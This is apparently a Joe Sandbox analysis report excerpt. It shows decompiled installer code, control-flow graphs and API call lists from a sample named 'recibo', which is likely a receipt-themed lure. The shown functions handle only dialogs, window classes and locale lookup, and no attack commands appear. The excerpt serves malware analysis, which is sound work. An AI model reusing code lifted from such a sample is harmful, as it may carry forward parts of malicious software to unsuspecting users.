40440a-40441d ShowWindow call 4044e5 292->298 293->212 300 404422 298->300 300->225
                                                                                  C-Code - Quality: 84%
                                                                                  			E00403F9A(struct HWND__* _a4, intOrPtr _a8, int _a12, long _a16) {
				struct HWND__* _v28;
				void* _v84;
				void* _v88;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t34;
				signed int _t36;
				signed int _t38;
				struct HWND__* _t48;
				signed int _t67;
				struct HWND__* _t73;
				signed int _t86;
				struct HWND__* _t91;
				signed int _t99;
				int _t103;
				signed int _t117;
				int _t118;
				int _t122;
				signed int _t124;
				struct HWND__* _t127;
				struct HWND__* _t128;
				int _t129;
				intOrPtr _t130;
				long _t133;
				int _t135;
				int _t136;
				void* _t137;
				void* _t146;

				_t130 = _a8;
				if(_t130 == 0x110 || _t130 == 0x408) {
					_t34 = _a12;
					_t127 = _a4;
					__eflags = _t130 - 0x110;
					 *0x42d250 = _t34;
					if(_t130 == 0x110) {
						 *0x434f08 = _t127;
						 *0x42d264 = GetDlgItem(_t127, 1);
						_t91 = GetDlgItem(_t127, 2);
						_push(0xffffffff);
						_push(0x1c);
						 *0x42b230 = _t91;
						E00404499(_t127);
						SetClassLongW(_t127, 0xfffffff2,  *0x433ee8);
						 *0x433ecc = E0040140B(4);
						_t34 = 1;
						__eflags = 1;
						 *0x42d250 = 1;
					}
					_t124 =  *0x40a368; // 0x0
					_t136 = 0;
					_t133 = (_t124 << 6) +  *0x434f20;
					__eflags = _t124;
					if(_t124 < 0) {
						L36:
						E004044E5(0x40b);
						while(1) {
							_t36 =  *0x42d250;
							 *0x40a368 =  *0x40a368 + _t36;
							_t133 = _t133 + (_t36 << 6);
							_t38 =  *0x40a368; // 0x0
							__eflags = _t38 -  *0x434f24;
							if(_t38 ==  *0x434f24) {
								E0040140B(1);
							}
							__eflags =  *0x433ecc - _t136; // 0x0
							if(__eflags != 0) {
								break;
							}
							__eflags =  *0x40a368 -  *0x434f24; // 0x0
							if(__eflags >= 0) {
								break;
							}
							_t117 =  *(_t133 + 0x14);
							E0040657A(_t117, _t127, _t133, 0x445000,  *((intOrPtr*)(_t133 + 0x24)));
							_push( *((intOrPtr*)(_t133 + 0x20)));
							_push(0xfffffc19);
							E00404499(_t127);
							_push( *((intOrPtr*)(_t133 + 0x1c)));
							_push(0xfffffc1b);
							E00404499(_t127);
							_push( *((intOrPtr*)(_t133 + 0x28)));
							_push(0xfffffc1a);
							E00404499(_t127);
							_t48 = GetDlgItem(_t127, 3);
							__eflags =  *0x434f8c - _t136;
							_v28 = _t48;
							if( *0x434f8c != _t136) {
								_t117 = _t117 & 0x0000fefd | 0x00000004;
								__eflags = _t117;
							}
							ShowWindow(_t48, _t117 & 0x00000008); // executed
							EnableWindow( *(_t137 + 0x34), _t117 & 0x00000100); // executed
							E004044BB(_t117 & 0x00000002);
							_t118 = _t117 & 0x00000004;
							EnableWindow( *0x42b230, _t118);
							__eflags = _t118 - _t136;
							if(_t118 == _t136) {
								_push(1);
							} else {
								_push(_t136);
							}
							EnableMenuItem(GetSystemMenu(_t127, _t136), 0xf060, ??);
							SendMessageW( *(_t137 + 0x3c), 0xf4, _t136, 1);
							__eflags =  *0x434f8c - _t136;
							if( *0x434f8c == _t136) {
								_push( *0x42d264);
							} else {
								SendMessageW(_t127, 0x401, 2, _t136);
								_push( *0x42b230);
							}
							E004044CE();
							E0040653D(0x42d268, E00403F7B());
							E0040657A(0x42d268, _t127, _t133,  &(0x42d268[lstrlenW(0x42d268)]),  *((intOrPtr*)(_t133 + 0x18)));
							SetWindowTextW(_t127, 0x42d268); // executed
							_push(_t136);
							_t67 = E00401389( *((intOrPtr*)(_t133 + 8)));
							__eflags = _t67;
							if(_t67 != 0) {
								continue;
							} else {
								__eflags =  *_t133 - _t136;
								if( *_t133 == _t136) {
									continue;
								}
								__eflags =  *(_t133 + 4) - 5;
								if( *(_t133 + 4) != 5) {
									DestroyWindow( *0x433ed8); // executed
									 *0x42c240 = _t133;
									__eflags =  *_t133 - _t136;
									if( *_t133 <= _t136) {
										goto L60;
									}
									_t73 = CreateDialogParamW( *0x434f00,  *_t133 +  *0x433ee0 & 0x0000ffff, _t127,  *( *(_t133 + 4) * 4 + "XF@"), _t133); // executed
									__eflags = _t73 - _t136;
									 *0x433ed8 = _t73;
									if(_t73 == _t136) {
										goto L60;
									}
									_push( *((intOrPtr*)(_t133 + 0x2c)));
									_push(6);
									E00404499(_t73);
									GetWindowRect(GetDlgItem(_t127, 0x3fa), _t137 + 0x10);
									ScreenToClient(_t127, _t137 + 0x10);
									SetWindowPos( *0x433ed8, _t136,  *(_t137 + 0x20),  *(_t137 + 0x20), _t136, _t136, 0x15);
									_push(_t136);
									E00401389( *((intOrPtr*)(_t133 + 0xc)));
									__eflags =  *0x433ecc - _t136; // 0x0
									if(__eflags != 0) {
										goto L63;
									}
									ShowWindow( *0x433ed8, 8); // executed
									E004044E5(0x405);
									goto L60;
								}
								__eflags =  *0x434f8c - _t136;
								if( *0x434f8c != _t136) {
									goto L63;
								}
								__eflags =  *0x434f80 - _t136;
								if( *0x434f80 != _t136) {
									continue;
								}
								goto L63;
							}
						}
						DestroyWindow( *0x433ed8);
						 *0x434f08 = _t136;
						EndDialog(_t127,  *0x42ba38);
						goto L60;
					} else {
						__eflags = _t34 - 1;
						if(_t34 != 1) {
							L35:
							__eflags =  *_t133 - _t136;
							if( *_t133 == _t136) {
								goto L63;
							}
							goto L36;
						}
						_push(0);
						_t86 = E00401389( *((intOrPtr*)(_t133 + 0x10)));
						__eflags = _t86;
						if(_t86 == 0) {
							goto L35;
						}
						SendMessageW( *0x433ed8, 0x40f, 0, 1);
						__eflags =  *0x433ecc - _t136; // 0x0
						return 0 | __eflags == 0x00000000;
					}
				} else {
					_t127 = _a4;
					_t136 = 0;
					if(_t130 == 0x47) {
						SetWindowPos( *0x42d248, _t127, 0, 0, 0, 0, 0x13);
					}
					_t122 = _a12;
					if(_t130 != 5) {
						L8:
						if(_t130 != 0x40d) {
							__eflags = _t130 - 0x11;
							if(_t130 != 0x11) {
								__eflags = _t130 - 0x111;
								if(_t130 != 0x111) {
									L28:
									return E00404500(_a8, _t122, _a16);
								}
								_t135 = _t122 & 0x0000ffff;
								_t128 = GetDlgItem(_t127, _t135);
								__eflags = _t128 - _t136;
								if(_t128 == _t136) {
									L15:
									__eflags = _t135 - 1;
									if(_t135 != 1) {
										__eflags = _t135 - 3;
										if(_t135 != 3) {
											_t129 = 2;
											__eflags = _t135 - _t129;
											if(_t135 != _t129) {
												L27:
												SendMessageW( *0x433ed8, 0x111, _t122, _a16);
												goto L28;
											}
											__eflags =  *0x434f8c - _t136;
											if( *0x434f8c == _t136) {
												_t99 = E0040140B(3);
												__eflags = _t99;
												if(_t99 != 0) {
													goto L28;
												}
												 *0x42ba38 = 1;
												L23:
												_push(0x78);
												L24:
												E00404472();
												goto L28;
											}
											E0040140B(_t129);
											 *0x42ba38 = _t129;
											goto L23;
										}
										__eflags =  *0x40a368 - _t136; // 0x0
										if(__eflags <= 0) {
											goto L27;
										}
										_push(0xffffffff);
										goto L24;
									}
									_push(_t135);
									goto L24;
								}
								SendMessageW(_t128, 0xf3, _t136, _t136);
								_t103 = IsWindowEnabled(_t128);
								__eflags = _t103;
								if(_t103 == 0) {
									L63:
									return 0;
								}
								goto L15;
							}
							SetWindowLongW(_t127, _t136, _t136);
							return 1;
						}
						DestroyWindow( *0x433ed8);
						 *0x433ed8 = _t122;
						L60:
						if( *0x42f268 == _t136) {
							_t146 =  *0x433ed8 - _t136; // 0x1043c
							if(_t146 != 0) {
								ShowWindow(_t127, 0xa); // executed
								 *0x42f268 = 1;
							}
						}
						goto L63;
					}
					asm("sbb eax, eax");
					ShowWindow( *0x42d248,  ~(_t122 - 1) & 0x00000005);
					if(_t122 != 2 || (GetWindowLongW(_t127, 0xfffffff0) & 0x21010000) != 0x1000000) {
						goto L28;
					} else {
						ShowWindow(_t127, 4);
						goto L8;
					}
				}
			}
































                                                                                  0x00403fa5
                                                                                  0x00403fac
                                                                                  0x00404113
                                                                                  0x00404117
                                                                                  0x0040411b
                                                                                  0x0040411d
                                                                                  0x00404122
                                                                                  0x0040412d
                                                                                  0x00404138
                                                                                  0x0040413d
                                                                                  0x0040413f
                                                                                  0x00404141
                                                                                  0x00404144
                                                                                  0x00404149
                                                                                  0x00404157
                                                                                  0x00404164
                                                                                  0x0040416b
                                                                                  0x0040416b
                                                                                  0x0040416c
                                                                                  0x0040416c
                                                                                  0x00404171
                                                                                  0x00404177
                                                                                  0x0040417e
                                                                                  0x00404184
                                                                                  0x00404186
                                                                                  0x004041c6
                                                                                  0x004041cb
                                                                                  0x004041d0
                                                                                  0x004041d0
                                                                                  0x004041d5
                                                                                  0x004041de
                                                                                  0x004041e0
                                                                                  0x004041e5
                                                                                  0x004041eb
                                                                                  0x004041ef
                                                                                  0x004041ef
                                                                                  0x004041f4
                                                                                  0x004041fa
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00404205
                                                                                  0x0040420b
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00404214
                                                                                  0x0040421c
                                                                                  0x00404221
                                                                                  0x00404224
                                                                                  0x0040422a
                                                                                  0x0040422f
                                                                                  0x00404232
                                                                                  0x00404238
                                                                                  0x0040423d
                                                                                  0x00404240
                                                                                  0x00404246
                                                                                  0x0040424e
                                                                                  0x00404254
                                                                                  0x0040425a
                                                                                  0x0040425e
                                                                                  0x00404265
                                                                                  0x00404265
                                                                                  0x00404265
                                                                                  0x0040426f
                                                                                  0x00404281
                                                                                  0x0040428d
                                                                                  0x00404292
                                                                                  0x0040429c
                                                                                  0x004042a2
                                                                                  0x004042a4
                                                                                  0x004042a9
                                                                                  0x004042a6
                                                                                  0x004042a6
                                                                                  0x004042a6
                                                                                  0x004042b9
                                                                                  0x004042d1
                                                                                  0x004042d3
                                                                                  0x004042d9
                                                                                  0x004042ee
                                                                                  0x004042db
                                                                                  0x004042e4
                                                                                  0x004042e6
                                                                                  0x004042e6
                                                                                  0x004042f4
                                                                                  0x00404305
                                                                                  0x0040431b
                                                                                  0x00404322
                                                                                  0x00404328
                                                                                  0x0040432c
                                                                                  0x00404331
                                                                                  0x00404333
                                                                                  0x00000000
                                                                                  0x00404339
                                                                                  0x00404339
                                                                                  0x0040433b
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00404341
                                                                                  0x00404345
                                                                                  0x0040436a
                                                                                  0x00404370
                                                                                  0x00404376
                                                                                  0x00404378
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x0040439e
                                                                                  0x004043a4
                                                                                  0x004043a6
                                                                                  0x004043ab
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x004043b1
                                                                                  0x004043b4
                                                                                  0x004043b7
                                                                                  0x004043ce
                                                                                  0x004043da
                                                                                  0x004043f3
                                                                                  0x004043f9
                                                                                  0x004043fd
                                                                                  0x00404402
                                                                                  0x00404408
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00404412
                                                                                  0x0040441d
                                                                                  0x00000000
                                                                                  0x0040441d
                                                                                  0x00404347
                                                                                  0x0040434d
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00404353
                                                                                  0x00404359
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x0040435f
                                                                                  0x00404333
                                                                                  0x0040442a
                                                                                  0x00404436
                                                                                  0x0040443d
                                                                                  0x00000000
                                                                                  0x00404188
                                                                                  0x00404188
                                                                                  0x0040418b
                                                                                  0x004041be
                                                                                  0x004041be
                                                                                  0x004041c0
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x004041c0
                                                                                  0x0040418d
                                                                                  0x00404191
                                                                                  0x00404196
                                                                                  0x00404198
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x004041a8
                                                                                  0x004041b0
                                                                                  0x00000000
                                                                                  0x004041b6
                                                                                  0x00403fbe
                                                                                  0x00403fbe
                                                                                  0x00403fc2
                                                                                  0x00403fc7
                                                                                  0x00403fd6
                                                                                  0x00403fd6
                                                                                  0x00403fdc
                                                                                  0x00403fe3
                                                                                  0x00404027
                                                                                  0x0040402d
                                                                                  0x00404046
                                                                                  0x00404049
                                                                                  0x0040405c
                                                                                  0x00404062
                                                                                  0x00404100
                                                                                  0x00000000
                                                                                  0x00404109
                                                                                  0x00404068
                                                                                  0x00404073
                                                                                  0x00404075
                                                                                  0x00404077
                                                                                  0x00404096
                                                                                  0x00404096
                                                                                  0x00404099
                                                                                  0x0040409e
                                                                                  0x004040a1
                                                                                  0x004040b1
                                                                                  0x004040b2
                                                                                  0x004040b4
                                                                                  0x004040ea
                                                                                  0x004040fa
                                                                                  0x00000000
                                                                                  0x004040fa
                                                                                  0x004040b6
                                                                                  0x004040bc
                                                                                  0x004040d5
                                                                                  0x004040da
                                                                                  0x004040dc
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x004040de
                                                                                  0x004040ca
                                                                                  0x004040ca
                                                                                  0x004040cc
                                                                                  0x004040cc
                                                                                  0x00000000
                                                                                  0x004040cc
                                                                                  0x004040bf
                                                                                  0x004040c4
                                                                                  0x00000000
                                                                                  0x004040c4
                                                                                  0x004040a3
                                                                                  0x004040a9
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x004040ab
                                                                                  0x00000000
                                                                                  0x004040ab
                                                                                  0x0040409b
                                                                                  0x00000000
                                                                                  0x0040409b
                                                                                  0x00404081
                                                                                  0x00404088
                                                                                  0x0040408e
                                                                                  0x00404090
                                                                                  0x00404466
                                                                                  0x00000000
                                                                                  0x00404466
                                                                                  0x00000000
                                                                                  0x00404090
                                                                                  0x0040404e
                                                                                  0x00000000
                                                                                  0x00404056
                                                                                  0x00404035
                                                                                  0x0040403b
                                                                                  0x00404443
                                                                                  0x00404449
                                                                                  0x0040444b
                                                                                  0x00404451
                                                                                  0x00404456
                                                                                  0x0040445c
                                                                                  0x0040445c
                                                                                  0x00404451
                                                                                  0x00000000
                                                                                  0x00404449
                                                                                  0x00403fea
                                                                                  0x00403ff6
                                                                                  0x00403fff
                                                                                  0x00000000
                                                                                  0x0040401e
                                                                                  0x00404021
                                                                                  0x00000000
                                                                                  0x00404021
                                                                                  0x00403fff

                                                                                  APIs
                                                                                  • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403FD6
                                                                                  • ShowWindow.USER32(?), ref: 00403FF6
                                                                                  • GetWindowLongW.USER32(?,000000F0), ref: 00404008
                                                                                  • ShowWindow.USER32(?,00000004), ref: 00404021
                                                                                  • DestroyWindow.USER32 ref: 00404035
                                                                                  • SetWindowLongW.USER32(?,00000000,00000000), ref: 0040404E
                                                                                  • GetDlgItem.USER32(?,?), ref: 0040406D
                                                                                  • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00404081
                                                                                  • IsWindowEnabled.USER32(00000000), ref: 00404088
                                                                                  • GetDlgItem.USER32(?,00000001), ref: 00404133
                                                                                  • GetDlgItem.USER32(?,00000002), ref: 0040413D
                                                                                  • SetClassLongW.USER32(?,000000F2,?), ref: 00404157
                                                                                  • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 004041A8
                                                                                  • GetDlgItem.USER32(?,00000003), ref: 0040424E
                                                                                  • ShowWindow.USER32(00000000,?), ref: 0040426F
                                                                                  • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00404281
                                                                                  • EnableWindow.USER32(?,?), ref: 0040429C
                                                                                  • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 004042B2
                                                                                  • EnableMenuItem.USER32(00000000), ref: 004042B9
                                                                                  • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 004042D1
                                                                                  • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 004042E4
                                                                                  • lstrlenW.KERNEL32(0042D268,?,0042D268,00000000), ref: 0040430E
                                                                                  • SetWindowTextW.USER32(?,0042D268), ref: 00404322
                                                                                  • ShowWindow.USER32(?,0000000A), ref: 00404456
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.23383250839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.23383193231.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383367093.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383431506.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383724604.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383783900.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383856333.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383921037.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383984080.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_recibo.jbxd
                                                                                  Similarity
                                                                                  • API ID: Window$Item$MessageSendShow$Long$EnableMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                                                  • String ID:
                                                                                  • API String ID: 121052019-0
                                                                                  • Opcode ID: 655396db076bddd1a804ad939a9de1a35d1e50ec2b89a3d41d0d0026322ce3ca
                                                                                  • Instruction ID: 19e8ffe36521fda3862950d2389d84f1ef0c133ac5ff71005f69e3a94542e2f3
                                                                                  • Opcode Fuzzy Hash: 655396db076bddd1a804ad939a9de1a35d1e50ec2b89a3d41d0d0026322ce3ca
                                                                                  • Instruction Fuzzy Hash: DDC1A1B1A00704ABDB206F61EE49E2B3A68FB84746F15053EF741B61F1CB799841DB2D
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 00403BEC Relevance: 42.2, APIs: 13, Strings: 11, Instructions: 215stringregistryCOMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 301 403bec-403c04 call 40690a 304 403c06-403c16 call 406484 301->304 305 403c18-403c4f call 40640b 301->305 313 403c72-403c9b call 403ec2 call 405f14 304->313 309 403c51-403c62 call 40640b 305->309 310 403c67-403c6d lstrcatW 305->310 309->310 310->313 319 403ca1-403ca6 313->319 320 403d2d-403d35 call 405f14 313->320 319->320 321 403cac-403cd4 call 40640b 319->321 326 403d43-403d68 LoadImageW 320->326 327 403d37-403d3e call 40657a 320->327 321->320 331 403cd6-403cda 321->331 329 403de9-403df1 call 40140b 326->329 330 403d6a-403d9a RegisterClassW 326->330 327->326 344 403df3-403df6 329->344 345 403dfb-403e06 call 403ec2 329->345 332 403da0-403de4 SystemParametersInfoW CreateWindowExW 330->332 333 403eb8 330->333 335 403cec-403cf8 lstrlenW 331->335 336 403cdc-403ce9 call 405e39 331->336 332->329 338 403eba-403ec1 333->338 339 403d20-403d28 call 405e0c call 40653d 335->339 340 403cfa-403d08 lstrcmpiW 335->340 336->335 339->320 340->339 343 403d0a-403d14 GetFileAttributesW 340->343 347 403d16-403d18 343->347 348 403d1a-403d1b call 405e58 343->348 344->338 354 403e0c-403e26 ShowWindow call 40689a 345->354 355 403e8f-403e90 call 405672 345->355 347->339 347->348 348->339 362 403e32-403e44 GetClassInfoW 354->362 363 403e28-403e2d call 40689a 354->363 358 403e95-403e97 355->358 360 403eb1-403eb3 call 40140b 358->360 361 403e99-403e9f 358->361 360->333 361->344 366 403ea5-403eac call 40140b 361->366 364 403e46-403e56 GetClassInfoW RegisterClassW 362->364 365 403e5c-403e7f DialogBoxParamW call 40140b 362->365 363->362 364->365 371 403e84-403e8d call 403b3c 365->371 366->344 371->338
                                                                                  C-Code - Quality: 96%
                                                                                  			E00403BEC(void* __eflags) {
				intOrPtr _v4;
				intOrPtr _v8;
				int _v12;
				void _v16;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t22;
				void* _t30;
				void* _t32;
				int _t33;
				void* _t36;
				int _t39;
				int _t40;
				intOrPtr _t41;
				int _t44;
				short _t63;
				WCHAR* _t65;
				signed char _t69;
				WCHAR* _t76;
				intOrPtr _t82;
				WCHAR* _t87;

				_t82 =  *0x434f10;
				_t22 = E0040690A(2);
				_t90 = _t22;
				if(_t22 == 0) {
					_t76 = 0x42d268;
					L"1033" = 0x30;
					 *0x442002 = 0x78;
					 *0x442004 = 0;
					E0040640B(_t78, __eflags, 0x80000001, L"Control Panel\\Desktop\\ResourceLocale", 0, 0x42d268, 0);
					__eflags =  *0x42d268;
					if(__eflags == 0) {
						E0040640B(_t78, __eflags, 0x80000003, L".DEFAULT\\Control Panel\\International",  &M004083D4, 0x42d268, 0);
					}
					lstrcatW(L"1033", _t76);
				} else {
					E00406484(L"1033",  *_t22() & 0x0000ffff);
				}
				E00403EC2(_t78, _t90);
				 *0x434f80 =  *0x434f18 & 0x00000020;
				 *0x434f9c = 0x10000;
				if(E00405F14(_t90, 0x440800) != 0) {
					L16:
					if(E00405F14(_t98, 0x440800) == 0) {
						E0040657A(_t76, 0, _t82, 0x440800,  *((intOrPtr*)(_t82 + 0x118)));
					}
					_t30 = LoadImageW( *0x434f00, 0x67, 1, 0, 0, 0x8040); // executed
					 *0x433ee8 = _t30;
					if( *((intOrPtr*)(_t82 + 0x50)) == 0xffffffff) {
						L21:
						if(E0040140B(0) == 0) {
							_t32 = E00403EC2(_t78, __eflags);
							__eflags =  *0x434fa0;
							if( *0x434fa0 != 0) {
								_t33 = E00405672(_t32, 0);
								__eflags = _t33;
								if(_t33 == 0) {
									E0040140B(1);
									goto L33;
								}
								__eflags =  *0x433ecc; // 0x0
								if(__eflags == 0) {
									E0040140B(2);
								}
								goto L22;
							}
							ShowWindow( *0x42d248, 5); // executed
							_t39 = E0040689A("RichEd20"); // executed
							__eflags = _t39;
							if(_t39 == 0) {
								E0040689A("RichEd32");
							}
							_t87 = L"RichEdit20W";
							_t40 = GetClassInfoW(0, _t87, 0x433ea0);
							__eflags = _t40;
							if(_t40 == 0) {
								GetClassInfoW(0, L"RichEdit", 0x433ea0);
								 *0x433ec4 = _t87;
								RegisterClassW(0x433ea0);
							}
							_t41 =  *0x433ee0; // 0x0
							_t44 = DialogBoxParamW( *0x434f00, _t41 + 0x00000069 & 0x0000ffff, 0, E00403F9A, 0); // executed
							E00403B3C(E0040140B(5), 1);
							return _t44;
						}
						L22:
						_t36 = 2;
						return _t36;
					} else {
						_t78 =  *0x434f00;
						 *0x433ea4 = E00401000;
						 *0x433eb0 =  *0x434f00;
						 *0x433eb4 = _t30;
						 *0x433ec4 = 0x40a380;
						if(RegisterClassW(0x433ea0) == 0) {
							L33:
							__eflags = 0;
							return 0;
						}
						SystemParametersInfoW(0x30, 0,  &_v16, 0);
						 *0x42d248 = CreateWindowExW(0x80, 0x40a380, 0, 0x80000000, _v16, _v12, _v8 - _v16, _v4 - _v12, 0, 0,  *0x434f00, 0);
						goto L21;
					}
				} else {
					_t78 =  *(_t82 + 0x48);
					_t92 = _t78;
					if(_t78 == 0) {
						goto L16;
					}
					_t76 = 0x432ea0;
					E0040640B(_t78, _t92,  *((intOrPtr*)(_t82 + 0x44)),  *0x434f38 + _t78 * 2,  *0x434f38 +  *(_t82 + 0x4c) * 2, 0x432ea0, 0);
					_t63 =  *0x432ea0; // 0x43
					if(_t63 == 0) {
						goto L16;
					}
					if(_t63 == 0x22) {
						_t76 = 0x432ea2;
						 *((short*)(E00405E39(0x432ea2, 0x22))) = 0;
					}
					_t65 = _t76 + lstrlenW(_t76) * 2 - 8;
					if(_t65 <= _t76 || lstrcmpiW(_t65, L".exe") != 0) {
						L15:
						E0040653D(0x440800, E00405E0C(_t76));
						goto L16;
					} else {
						_t69 = GetFileAttributesW(_t76);
						if(_t69 == 0xffffffff) {
							L14:
							E00405E58(_t76);
							goto L15;
						}
						_t98 = _t69 & 0x00000010;
						if((_t69 & 0x00000010) != 0) {
							goto L15;
						}
						goto L14;
					}
				}
			}

























                                                                                  0x00403bf2
                                                                                  0x00403bfb
                                                                                  0x00403c02
                                                                                  0x00403c04
                                                                                  0x00403c18
                                                                                  0x00403c2a
                                                                                  0x00403c33
                                                                                  0x00403c3c
                                                                                  0x00403c43
                                                                                  0x00403c48
                                                                                  0x00403c4f
                                                                                  0x00403c62
                                                                                  0x00403c62
                                                                                  0x00403c6d
                                                                                  0x00403c06
                                                                                  0x00403c11
                                                                                  0x00403c11
                                                                                  0x00403c72
                                                                                  0x00403c85
                                                                                  0x00403c8a
                                                                                  0x00403c9b
                                                                                  0x00403d2d
                                                                                  0x00403d35
                                                                                  0x00403d3e
                                                                                  0x00403d3e
                                                                                  0x00403d54
                                                                                  0x00403d5a
                                                                                  0x00403d68
                                                                                  0x00403de9
                                                                                  0x00403df1
                                                                                  0x00403dfb
                                                                                  0x00403e00
                                                                                  0x00403e06
                                                                                  0x00403e90
                                                                                  0x00403e95
                                                                                  0x00403e97
                                                                                  0x00403eb3
                                                                                  0x00000000
                                                                                  0x00403eb3
                                                                                  0x00403e99
                                                                                  0x00403e9f
                                                                                  0x00403ea7
                                                                                  0x00403ea7
                                                                                  0x00000000
                                                                                  0x00403e9f
                                                                                  0x00403e14
                                                                                  0x00403e1f
                                                                                  0x00403e24
                                                                                  0x00403e26
                                                                                  0x00403e2d
                                                                                  0x00403e2d
                                                                                  0x00403e38
                                                                                  0x00403e40
                                                                                  0x00403e42
                                                                                  0x00403e44
                                                                                  0x00403e4d
                                                                                  0x00403e50
                                                                                  0x00403e56
                                                                                  0x00403e56
                                                                                  0x00403e5c
                                                                                  0x00403e75
                                                                                  0x00403e86
                                                                                  0x00000000
                                                                                  0x00403e8b
                                                                                  0x00403df3
                                                                                  0x00403df5
                                                                                  0x00000000
                                                                                  0x00403d6a
                                                                                  0x00403d6a
                                                                                  0x00403d76
                                                                                  0x00403d80
                                                                                  0x00403d86
                                                                                  0x00403d8b
                                                                                  0x00403d9a
                                                                                  0x00403eb8
                                                                                  0x00403eb8
                                                                                  0x00000000
                                                                                  0x00403eb8
                                                                                  0x00403da9
                                                                                  0x00403de4
                                                                                  0x00000000
                                                                                  0x00403de4
                                                                                  0x00403ca1
                                                                                  0x00403ca1
                                                                                  0x00403ca4
                                                                                  0x00403ca6
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00403cb4
                                                                                  0x00403cc6
                                                                                  0x00403ccb
                                                                                  0x00403cd4
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00403cda
                                                                                  0x00403cdc
                                                                                  0x00403ce9
                                                                                  0x00403ce9
                                                                                  0x00403cf2
                                                                                  0x00403cf8
                                                                                  0x00403d20
                                                                                  0x00403d28
                                                                                  0x00000000
                                                                                  0x00403d0a
                                                                                  0x00403d0b
                                                                                  0x00403d14
                                                                                  0x00403d1a
                                                                                  0x00403d1b
                                                                                  0x00000000
                                                                                  0x00403d1b
                                                                                  0x00403d16
                                                                                  0x00403d18
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00403d18
                                                                                  0x00403cf8

                                                                                  APIs
                                                                                    • Part of subcall function 0040690A: GetModuleHandleA.KERNEL32(?,00000020,?,0040363D,0000000B), ref: 0040691C
                                                                                    • Part of subcall function 0040690A: GetProcAddress.KERNEL32(00000000,?), ref: 00406937
                                                                                  • lstrcatW.KERNEL32(1033,0042D268), ref: 00403C6D
                                                                                  • lstrlenW.KERNEL32(Call,?,?,?,Call,00000000,00440800,1033,0042D268,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D268,00000000,00000002,77343420), ref: 00403CED
                                                                                  • lstrcmpiW.KERNEL32(?,.exe,Call,?,?,?,Call,00000000,00440800,1033,0042D268,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D268,00000000), ref: 00403D00
                                                                                  • GetFileAttributesW.KERNEL32(Call,?,00000000,?), ref: 00403D0B
                                                                                  • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,00440800), ref: 00403D54
                                                                                    • Part of subcall function 00406484: wsprintfW.USER32 ref: 00406491
                                                                                  • RegisterClassW.USER32(00433EA0), ref: 00403D91
                                                                                  • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403DA9
                                                                                  • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403DDE
                                                                                  • ShowWindow.USER32(00000005,00000000,?,00000000,?), ref: 00403E14
                                                                                  • GetClassInfoW.USER32(00000000,RichEdit20W,00433EA0), ref: 00403E40
                                                                                  • GetClassInfoW.USER32(00000000,RichEdit,00433EA0), ref: 00403E4D
                                                                                  • RegisterClassW.USER32(00433EA0), ref: 00403E56
                                                                                  • DialogBoxParamW.USER32(?,00000000,00403F9A,00000000), ref: 00403E75
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.23383250839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.23383193231.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383367093.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383431506.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383724604.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
